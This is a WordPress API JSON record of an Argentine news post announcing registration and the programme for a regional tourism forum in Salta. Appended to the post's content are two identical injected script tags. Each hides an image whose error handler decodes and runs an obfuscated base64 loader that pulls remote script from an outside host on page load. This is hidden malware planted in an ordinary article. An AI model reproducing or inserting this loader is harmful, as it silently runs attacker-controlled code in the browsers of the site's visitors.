{"id":3054,"date":"2023-09-04T10:28:49","date_gmt":"2023-09-04T13:28:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3054"},"modified":"2025-08-14T00:09:14","modified_gmt":"2025-08-14T03:09:14","slug":"ultimos-dias-de-inscripcion-para-el-foro-regional-de-turismo-del-norte","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3054","title":{"rendered":"\u00daltimo d\u00eda de inscripci\u00f3n para el Foro Regional de Turismo del Norte"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-color has-text-color has-background\" style=\"background-color:#78082b\"><em>De forma gratuita, se realizar\u00e1 ma\u00f1ana 5 de septiembre en el Centro de Convenciones Salta, con destacados expositores. Mario Pergolini, ser\u00e1 uno de los oradores sobre Comunicaci\u00f3n y Marketing digital para el turismo. Hasta el momento son 1700 los participantes de toda la regi\u00f3n.<\/em><\/h4>\n\n\n\n<p>Los sectores p\u00fablicos y privados de las seis provincias del Norte argentino analizar\u00e1n experiencias que apunten al crecimiento en mercados internacionales, para los que fueron convocados especialistas nacionales e internacionales. La jornada con acceso libre, ser\u00e1 ma\u00f1ana&nbsp;5 de septiembre en el Centro de Convenciones Salta.<\/p>\n\n\n\n<p>Con el objetivo de continuar el trabajo de internacionalizaci\u00f3n del Norte argentino, la actividad est\u00e1 destinada a profesionales de la industria tur\u00edstica, actores p\u00fablicos y privados, emprendedores, referentes empresariales y estudiantes. La inscripci\u00f3n que es gratuita debe registrarse en&nbsp;<a href=\"https:\/\/fororegionalnorte.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/fororegionalnorte.gob.ar\/<\/a>. Hasta el momento son 1700 los participantes de toda la regi\u00f3n.&nbsp;<\/p>\n\n\n\n<p>Catamarca, Jujuy, La Rioja, Salta, Santiago del Estero y Tucum\u00e1n participan en este Foro que tiene por objetivo profundizar el posicionamiento en mercados internacionales de la marca Norte y promover el desarrollo de experiencias sustentables.<\/p>\n\n\n\n<p>Las exposiciones estar\u00e1n a cargo de profesionales nacionales e internacionales que se referir\u00e1n a tem\u00e1ticas vinculadas a las experiencias tur\u00edsticas sostenibles de gesti\u00f3n integrada, capacidades provinciales y municipales relacionadas con la integraci\u00f3n regional p\u00fablico\/privada en materia de desarrollo y promoci\u00f3n tur\u00edstica, entre otros.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8703-foro-regional-de-turismo-del-norte.jpg\" alt=\"\" width=\"242\" height=\"162\"\/><\/figure><\/div>\n\n\n<p><strong>Programa<\/strong><\/p>\n\n\n\n<p>La jornada iniciar\u00e1 a las 9 hs con el saludo de las autoridades del Ente Norte; a las 9.15 hs se realizar\u00e1 el panel Contexto actual del turismo en Argentina. Proyecci\u00f3n Internacional que estar\u00e1 a cargo de los presidentes de las Regiones Tur\u00edsticas de Argentina; en tanto, a las 10 hs se llevar\u00e1 a cabo un panel con operadores receptivos.<\/p>\n\n\n\n<p>El consultor de la OMT V\u00edctor Chal\u00e9 de M\u00e9xico abordar\u00e1 a las 10.20 hs la Experiencia de articulaci\u00f3n integrada para el desarrollo e internacionalizaci\u00f3n de los destinos. Caso Mundo Maya. Adem\u00e1s, Sergio Feferovich expondr\u00e1 a las 11.10 hs \u201cLa M\u00fasica de las Ideas. Creatividad aplicada al dise\u00f1o de experiencias tur\u00edsticas sostenibles\u201d. La apertura oficial se realizar\u00e1 a las 12.10.<\/p>\n\n\n\n<p>La excapitana de Las Leonas Magui Aicega tendr\u00e1 a cargo a las 12.40 Construyendo Futuro. Espacio de motivaci\u00f3n para el trabajo en equipo. La actividad continuar\u00e1 a las 15 hs con Dise\u00f1os Inteligentes para el desarrollo, posicionamiento e internacionalizaci\u00f3n de Experiencias Tur\u00edsticas Sostenibles de gesti\u00f3n integrada por V\u00edctor Chal\u00e9. Posteriormente se realizar\u00e1 un Taller de Dise\u00f1o de Experiencias Tur\u00edsticas inteligentes, Sostenibles<\/p>\n\n\n\n<p>La jornada finalizar\u00e1 con la exposici\u00f3n de Mario Pergolini quien expondr\u00e1 acerca de Comunicaci\u00f3n y Marketing Digital para el Turismo, sector p\u00fablico y privado a partir de las 16.30 hs.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/ltimos-dias-de-inscripcion-para-el-foro-regional-de-turismo-del-norte-91625\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>De forma gratuita, se realizar\u00e1 ma\u00f1ana 5 de septiembre en el Centro de Convenciones Salta, con destacados expositores. Mario Pergolini, ser\u00e1 uno de los oradores sobre Comunicaci\u00f3n y Marketing digital para el turismo. Hasta el momento son 1700 los participantes de toda la regi\u00f3n. Los sectores p\u00fablicos y privados de las seis provincias del Norte [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3055,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,16],"tags":[],"class_list":{"0":"post-3054","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3054"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3054"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3054\/revisions"}],"predecessor-version":[{"id":6975,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3054\/revisions\/6975"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3055"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3054"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3054"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3054"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}